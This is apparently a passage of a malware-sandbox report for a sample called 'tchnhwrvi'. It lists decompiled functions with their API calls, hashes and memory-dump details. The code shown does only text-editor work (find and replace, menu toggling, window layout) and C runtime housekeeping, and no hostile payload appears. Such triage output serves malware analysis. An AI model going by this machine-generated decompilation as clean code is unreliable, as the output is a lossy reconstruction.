                    0x00282897
                    0x00000000
                    0x00282897
                    0x00282814
                    0x00282817
                    0x00000000
                    0x00000000
                    0x00282825
                    0x0028283b
                    0x00282842
                    0x00282861
                    0x0028286b
                    0x00282874
                    0x00282877
                    0x00282877
                    0x00282889
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002827d2
                    0x00282790
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID: .txt$`iqt Oqt
                    • API String ID: 0-3182384896
                    • Opcode ID: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction ID: 3bf0595eebac5de2ad1b18e5868a71838e70d44a66886fd02558aea9b8b7c482
                    • Opcode Fuzzy Hash: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction Fuzzy Hash: 7D51E57E922226DBDF347F65EC8DBB6B3A4EF14710F14015AE986920D0F7704CA88761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92memorystringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00281FF0(intOrPtr _a4) {
				void* _v8;
				int _v12;
				signed int _t27;
				intOrPtr _t43;
				int _t56;
				void* _t58;

				_t43 = _a4;
				_v12 = lstrlenW( *(_t43 + 0x10));
				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
				_t56 = _t4;
				_t27 = HeapAlloc(GetProcessHeap(), 0, _t56 + _t56);
				_t58 = _t27;
				if(_t58 == 0) {
					L13:
					return _t27;
				} else {
					GetWindowTextW( *0x2970ec, _t58, _t56);
					SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
					_t27 =  *(_t43 + 0xc) & 0x00000005;
					if(_t27 > 5) {
						goto L13;
					} else {
						switch( *((intOrPtr*)(_t27 * 4 +  &M00282110))) {
							case 0:
								goto L10;
							case 1:
								goto L13;
							case 2:
								_t44 =  *(_t43 + 0x10);
								_t57 = _t58 + (_v8 - _v12) * 2 - 2;
								lstrlenW(_t44);
								if(_t57 < _t58) {
									L7:
									_t57 = 0;
								} else {
									while(lstrcmpW(_t57, _t44) != 0) {
										_t57 = _t57 - 2;
										if(_t57 >= _t58) {
											continue;
										} else {
											goto L7;
										}
										goto L8;
									}
								}
								L8:
								_t45 = _a4;
								L10:
								_v8 = _t57 - _t58 >> 1;
								HeapFree(GetProcessHeap(), 0, _t58);
								if(_t57 != 0) {
									return SendMessageW( *0x2970ec, 0xb1, _v8, _v8 + _v12);
								}
								_push(0x40);
								_push( *((intOrPtr*)(_t45 + 0x10)));
								_push(0x17b);
								_push( *0x2970e8);
								return  *0x280000();
								goto L14;
						}
					}
				}
				L14:
			}









                    0x00281ff7
                    0x0028200d
                    0x00282016
                    0x00282016
                    0x00282026
                    0x0028202c
                    0x00282030
                    0x0028210c
                    0x0028210c
                    0x00282036
                    0x0028203e
                    0x00282056
                    0x0028205f
                    0x00282065
                    0x00000000
                    0x0028206b
                    0x0028206b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00282075
                    0x0028207c
                    0x00282080
                    0x00282088
                    0x002820a3
                    0x002820a3
                    0x00000000
                    0x00282090
                    0x0028209c
                    0x002820a1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002820a1
                    0x00282090
                    0x002820a5
                    0x002820a5
                    0x002820ad
                    0x002820b6
                    0x002820c0
                    0x002820c8
                    0x00000000
                    0x00282100
                    0x002820d2
                    0x002820d4
                    0x002820d5
                    0x002820da
                    0x002820e7
                    0x00000000
                    0x00000000
                    0x0028206b
                    0x00282065
                    0x00000000

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282000
                    • GetWindowTextLengthW.USER32(?), ref: 00282010
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028201F
                    • HeapAlloc.KERNEL32(00000000), ref: 00282026
                    • GetWindowTextW.USER32 ref: 0028203E
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282056
                    • lstrlenW.KERNEL32(?), ref: 00282080
                    • lstrcmpW.KERNEL32(?,?), ref: 00282092
                    • GetProcessHeap.KERNEL32(00000000), ref: 002820B9
                    • HeapFree.KERNEL32(00000000), ref: 002820C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$ProcessTextWindowlstrlen$AllocFreeLengthMessageSendlstrcmp
                    • String ID: Oqt
                    • API String ID: 1368074758-2617001805
                    • Opcode ID: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction ID: 21995c4cf460e4af86b09fb496de49a243d0c83920fad183772143e15c0c25f3
                    • Opcode Fuzzy Hash: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction Fuzzy Hash: D6316D76611208EFCB10DFA8FCCDF6A7B79FB98711F148406EA0A97290C630A914CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282130 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73memorystringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00282130(intOrPtr __edi) {
				void* _v8;
				void* _v12;
				int _v16;
				void* _t19;
				void* _t26;
				signed int _t27;
				void* _t34;
				intOrPtr _t44;
				int _t45;

				_t44 = __edi;
				_v16 = lstrlenW( *(__edi + 0x10));
				_t3 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
				_t45 = _t3;
				_t19 = HeapAlloc(GetProcessHeap(), 0, _t45 + _t45);
				_t34 = _t19;
				if(_t34 != 0) {
					GetWindowTextW( *0x2970ec, _t34, _t45);
					SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
					if(_t26 == 0) {
						L3:
						_t27 = _v12;
						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t44 + 0x10), _t34 + _t27 * 2) == 0) {
							SendMessageW( *0x2970ec, 0xc2, 1,  *(_t44 + 0x14));
						}
						HeapFree(GetProcessHeap(), 0, _t34);
						return E00281FF0(_t44);
					}
					_t19 = _t26 - 4;
					if(_t19 == 0) {
						goto L3;
					}
				}
				return _t19;
			}












                    0x00282130
                    0x00282149
                    0x00282152
                    0x00282152
                    0x00282162
                    0x00282168
                    0x0028216c
                    0x0028217a
                    0x00282199
                    0x002821a1
                    0x002821a2
                    0x002821a9
                    0x002821a9
                    0x002821b4
                    0x002821da
                    0x002821da
                    0x002821e6
                    0x00000000
                    0x002821ed
                    0x002821a4
                    0x002821a7
                    0x00000000
                    0x00000000
                    0x002821a7
                    0x002821f7

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0028213C
                    • GetWindowTextLengthW.USER32(?), ref: 0028214C
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028215B
                    • HeapAlloc.KERNEL32(00000000), ref: 00282162
                    • GetWindowTextW.USER32 ref: 0028217A
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00282199
                    • lstrcmpW.KERNEL32(?), ref: 002821BE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002821DA
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002821DF
                    • HeapFree.KERNEL32(00000000), ref: 002821E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
                    • String ID: Oqt
                    • API String ID: 276103653-2617001805
                    • Opcode ID: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction ID: c0cec1cefe3ffd0548520bcef76ecaa997d3f50c056d272f78f392dfc354abf1
                    • Opcode Fuzzy Hash: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction Fuzzy Hash: 13213E76A10209EFDB10EFA4EC8CE6A777CFB48300B008506FA0A97290DA70A9548B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281F50 Relevance: 15.1, APIs: 10, Instructions: 62windowclipboardCOMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E00281F50(struct HMENU__* __esi) {
				signed int _t4;
				signed int _t8;
				signed int _t17;
				int _t23;

				_t4 = SendMessageW( *0x2970ec, 0xc6, 0, 0);
				asm("sbb eax, eax");
				EnableMenuItem(__esi, 0x110,  ~_t4 + 1);
				_t8 = IsClipboardFormatAvailable(1);
				asm("sbb eax, eax");
				EnableMenuItem(__esi, 0x113,  ~_t8 + 1);
				_t23 = 0 | SendMessageW( *0x2970ec, 0xb0, 0, 0) >> 0x00000010 == _t12;
				EnableMenuItem(__esi, 0x111, _t23);
				EnableMenuItem(__esi, 0x112, _t23);
				EnableMenuItem(__esi, 0x114, _t23);
				_t17 = GetWindowTextLengthW( *0x2970ec);
				asm("sbb eax, eax");
				return EnableMenuItem(__esi, 0x116,  ~_t17 + 1);
			}







                    0x00281f67
                    0x00281f71
                    0x00281f7b
                    0x00281f7f
                    0x00281f87
                    0x00281f91
                    0x00281faf
                    0x00281fb9
                    0x00281fc2
                    0x00281fcb
                    0x00281fd3
                    0x00281fdb
                    0x00281fe9

                    APIs
                    • SendMessageW.USER32(?,000000C6,00000000,00000000), ref: 00281F67
                    • EnableMenuItem.USER32 ref: 00281F7B
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00281F7F
                    • EnableMenuItem.USER32 ref: 00281F91
                    • SendMessageW.USER32(?,000000B0,00000000,00000000), ref: 00281FA3
                    • EnableMenuItem.USER32 ref: 00281FB9
                    • EnableMenuItem.USER32 ref: 00281FC2
                    • EnableMenuItem.USER32 ref: 00281FCB
                    • GetWindowTextLengthW.USER32(?), ref: 00281FD3
                    • EnableMenuItem.USER32 ref: 00281FE5
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
                    • String ID:
                    • API String ID: 2096502293-0
                    • Opcode ID: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction ID: 9ebaacd92223f7de4efb172a6879930719cc3c5db8172e0a30180bb5fcdef24f
                    • Opcode Fuzzy Hash: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction Fuzzy Hash: CC0169B17E121C7EF2247B75AC8BFBB225CDFC6B05F104112F702EA0D1CAA599028978
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002867DB Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E002867DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x292108);
				E00283D50(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x290d30;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x294680;
				E00286FB4(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E0028687D();
				E00286FB4(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t15 = _t40 + 0xc; // 0x282e0d
				_t26 =  *_t15;
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x294de8; // 0x294d10
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00288D2A( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E00283D95(E00286886());
			}







                    0x002867db
                    0x002867db
                    0x002867dd
                    0x002867e2
                    0x002867ec
                    0x002867f2
                    0x002867f5
                    0x002867fc
                    0x00286803
                    0x00286806
                    0x00286809
                    0x00286810
                    0x00286817
                    0x00286820
                    0x00286826
                    0x0028682d
                    0x00286833
                    0x0028683a
                    0x00286841
                    0x00286847
                    0x0028684a
                    0x0028684a
                    0x0028684d
                    0x00286852
                    0x00286854
                    0x00286859
                    0x00286859
                    0x0028685f
                    0x00286865
                    0x00286876

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00292108,00000008,002868E3,00000000,00000000,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 002867EC
                    • __lock.LIBCMT ref: 00286820
                      • Part of subcall function 00286FB4: __mtinitlocknum.LIBCMT ref: 00286FCA
                      • Part of subcall function 00286FB4: __amsg_exit.LIBCMT ref: 00286FD6
                      • Part of subcall function 00286FB4: EnterCriticalSection.KERNEL32(00000000,00000000,?,00286825,0000000D,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 00286FDE
                    • InterlockedIncrement.KERNEL32(?), ref: 0028682D
                    • __lock.LIBCMT ref: 00286841
                    • ___addlocaleref.LIBCMT ref: 0028685F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: .($0)$KERNEL32.DLL
                    • API String ID: 637971194-3816618702
                    • Opcode ID: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction ID: 897f178debcedfd16e2537ee1b020bdec4b7f6cfe0dc2366be9cfbc5eb196a45
                    • Opcode Fuzzy Hash: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction Fuzzy Hash: D201AD75412700EFD720BF65E809709FBE0AF10320F10490EE49A577E0CBB0AA64CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281160 Relevance: 10.6, APIs: 7, Instructions: 66windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00281160() {
				struct tagRECT _v20;
				struct tagRECT _v36;
				signed int _t10;
				int _t21;
				int _t34;
				intOrPtr _t35;

				_t10 = 0 |  *0x2970f8 == 0x00000000;
				 *0x2970f8 = _t10;
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~_t10 & 0x00000008);
				GetClientRect( *0x2970e4,  &_v20);
				asm("sbb eax, eax");
				ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
				_t35 = _v20.bottom;
				_t34 = _v20.right;
				_t21 = 0;
				if( *0x2970f8 != 0) {
					SendMessageW( *0x2970f4, 5, 0, 0);
					GetWindowRect( *0x2970f4,  &_v36);
					_t21 = _v36.bottom - _v36.top;
				}
				SetWindowPos( *0x2970ec, 0, 0, 0, _t34, _t35 - _t21, 0x204);
				return E00281090();
			}









                    0x0028116f
                    0x00281173
                    0x0028117a
                    0x00281192
                    0x002811a3
                    0x002811b6
                    0x002811bd
                    0x002811c3
                    0x002811c6
                    0x002811c9
                    0x002811d1
                    0x002811de
                    0x002811ef
                    0x002811f8
                    0x002811f8
                    0x00281211
                    0x00281221

                    APIs
                    • GetMenu.USER32(?), ref: 0028118B
                    • CheckMenuItem.USER32(00000000), ref: 00281192
                    • GetClientRect.USER32 ref: 002811A3
                    • ShowWindow.USER32(?,?), ref: 002811BD
                    • SendMessageW.USER32(?,00000005,00000000,00000000), ref: 002811DE
                    • GetWindowRect.USER32 ref: 002811EF
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000204), ref: 00281211
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Window$MenuRect$CheckClientItemMessageSendShow
                    • String ID:
                    • API String ID: 1873219884-0
                    • Opcode ID: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction ID: d298f31800ca825345a110d533cc6ed42ef43913a9f12aa33c3243670af063dc
                    • Opcode Fuzzy Hash: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction Fuzzy Hash: 0211607566421AAFD710DB74FD8EEBB37BCEB48701F104527FA19D3290E634A8408B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00288869 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E00288869(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x292218);
				E00283D50(__ebx, __edi, __esi);
				_t31 = E00286908(__ebx, __edx, _t35);
				_t15 =  *0x294ba0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00286FB4(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x294aa8; // 0x28f2ba0
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x294680;
								if(__eflags != 0) {
									E00286D64(_t33);
								}
							}
						}
						_t21 =  *0x294aa8; // 0x28f2ba0
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x294aa8; // 0x28f2ba0
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00288904();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00286018(_t29, _t38);
				}
				return E00283D95(_t33);
			}









                    0x00288869
                    0x00288869
                    0x00288869
                    0x00288869
                    0x0028886b
                    0x00288870
                    0x0028887a
                    0x0028887c
                    0x00288884
                    0x002888a5
                    0x002888ab
                    0x002888af
                    0x002888b2
                    0x002888b5
                    0x002888bb
                    0x002888bd
                    0x002888bf
                    0x002888c8
                    0x002888ca
                    0x002888cc
                    0x002888d2
                    0x002888d5
                    0x002888da
                    0x002888d2
                    0x002888ca
                    0x002888db
                    0x002888e0
                    0x002888e3
                    0x002888e9
                    0x002888ed
                    0x002888ed
                    0x002888f3
                    0x002888fa
                    0x0028888c
                    0x0028888c
                    0x0028888c
                    0x0028888f
                    0x00288891
                    0x00288893
                    0x00288895
                    0x0028889a
                    0x002888a2

                    APIs
                    • __getptd.LIBCMT ref: 00288875
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __amsg_exit.LIBCMT ref: 00288895
                    • __lock.LIBCMT ref: 002888A5
                    • InterlockedDecrement.KERNEL32(?), ref: 002888C2
                    • _free.LIBCMT ref: 002888D5
                    • InterlockedIncrement.KERNEL32(028F2BA0), ref: 002888ED
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction ID: 84137c96b7b895cfbe0124852af427265dd5a560597324c05d5ac04aedb2ce7a
                    • Opcode Fuzzy Hash: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction Fuzzy Hash: D0018439D6272AAFCB20BF54A809B5D7760BF04720FC5001AE800676D1CB346972CFD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002892BB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E002892BB(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E002841F6( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E002893EB( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00283CF8(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                    0x002892c5
                    0x002892cc
                    0x002892e3
                    0x00000000
                    0x002892d3
                    0x002892d5
                    0x002892ef
                    0x002892f4
                    0x002892f7
                    0x002892fa
                    0x00289322
                    0x00289329
                    0x0028932b
                    0x002893ac
                    0x002893c7
                    0x002893c9
                    0x00289309
                    0x00289309
                    0x0028930c
                    0x0028930e
                    0x00289311
                    0x00289311
                    0x00289311
                    0x00289311
                    0x00000000
                    0x00289317
                    0x0028938b
                    0x0028938b
                    0x00289390
                    0x00289396
                    0x00289399
                    0x0028939b
                    0x0028939e
                    0x0028939e
                    0x0028939e
                    0x0028939e
                    0x00000000
                    0x002893a2
                    0x0028932d
                    0x00289330
                    0x00289336
                    0x00289339
                    0x00289360
                    0x00289363
                    0x00289369
                    0x00000000
                    0x00000000
                    0x0028936b
                    0x0028936e
                    0x00000000
                    0x00000000
                    0x00289370
                    0x00289370
                    0x00289376
                    0x00289379
                    0x002892e8
                    0x002892e8
                    0x00289382
                    0x00000000
                    0x00289382
                    0x0028933b
                    0x0028933e
                    0x00000000
                    0x00000000
                    0x00289342
                    0x00289353
                    0x00289359
                    0x0028935b
                    0x0028935e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0028935e
                    0x002892fc
                    0x002892ff
                    0x00289301
                    0x00289306
                    0x00289306
                    0x00000000
                    0x002892d7
                    0x002892d7
                    0x002892dc
                    0x002892e0
                    0x002892e0
                    0x00000000
                    0x002892dc
                    0x002892d5

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002892EF
                    • __isleadbyte_l.LIBCMT ref: 00289322
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,?,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 00289353
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,00000001,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 002893C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
